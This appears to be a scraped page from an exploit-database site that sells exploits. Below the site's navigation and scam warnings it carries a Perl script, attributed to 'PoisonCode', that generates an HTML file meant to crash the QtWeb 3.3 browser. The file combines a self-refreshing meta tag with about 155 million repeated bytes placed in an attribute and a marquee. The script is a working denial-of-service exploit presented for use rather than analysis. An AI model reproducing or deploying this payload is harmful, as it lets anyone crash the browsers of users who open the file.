0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
QtWeb 3.3 Remote DoS / Crash Exploit
==================================== QtWeb 3.3 Remote DoS / Crash Exploit ==================================== # Title:QtWeb 3.3 Remote DoS/Crash Exploit # Software Link:http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable: http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Platform:Windows _____ _____ _ _ | __ \ / ____| (_) | | |__) | (___ ___ ___ _ _ _ __ _| |_ _ _ | ___/ \___ \ / _ \/ __| | | | '__| | __| | | | | | ____) | __/ (__| |_| | | | | |_| |_| | |_| |_____/ \___|\___|\__,_|_| |_|\__|\__, | __/ | |___/ Exploit ---------------- #!/usr/bin/perl # File Name :QtWeb 3.3 Remote DoS/Crash Exploit # Vuln :Remote Dos/Crash # Author :PoisonCode # Exploit Title: QtWeb 3.3 Remote DoS/Crash Exploit # Date:02/06/2010 # Author:PoisonCode # Site :http://www.qtweb.net/ # Software Link: http://www.qtweb.net/downloads/QtWeb-setup.exe # Portable:http://www.qtweb.net/downloads/QtWeb.exe # Version: 3.3 # Tested on: Windows $file="Exploit QtWeb 3.3.html"; print " ======================================\n"; print " = QtWeb 3.3 Remote DoS/Crash Exploit =\n"; print " = Autor:PoisonCode =\n"; print " = Web :PanamaSecurity.blogspot.com =\n"; print " ======================================\n"; print "\n"; print " Espere Mientras se Genera el Exploit\n"; my $a="\x55" x 100000000; my $b="\85" x 55900000; my $c="\x7C\x95\x64\xAE\x00\x96\xbd\x40\x00\x09\8a\86\x5A\x65\x72\x30\x0\x54\x68\x75\x6E\x64\x65\x72"; open(myfile,">>$file"); print myfile "<html>"; print myfile "<title>PanamaSecurity - PoisonCode $c </title>"; print myfile '<head><meta http-equiv="refresh" content="0; url=Exploit QtWeb3.3.html"></head>'; print myfile "<body alink="; print myfile $a,$b,$c; print myfile "<marquee>$a,$b,$c</marquee>"; print myfile '">'; print myfile "</html>"; close(myfile); print "\n"; print " Nombre del Archivo : $file\n"; print " Se Ha Creado El Exploit Correctamente \n"; print "\n"; print "----------------------------------------------------------------------\n"; print " Visiten : PanamaSecurity.blogspot.com\n"; # 0day.today [2024-12-23] #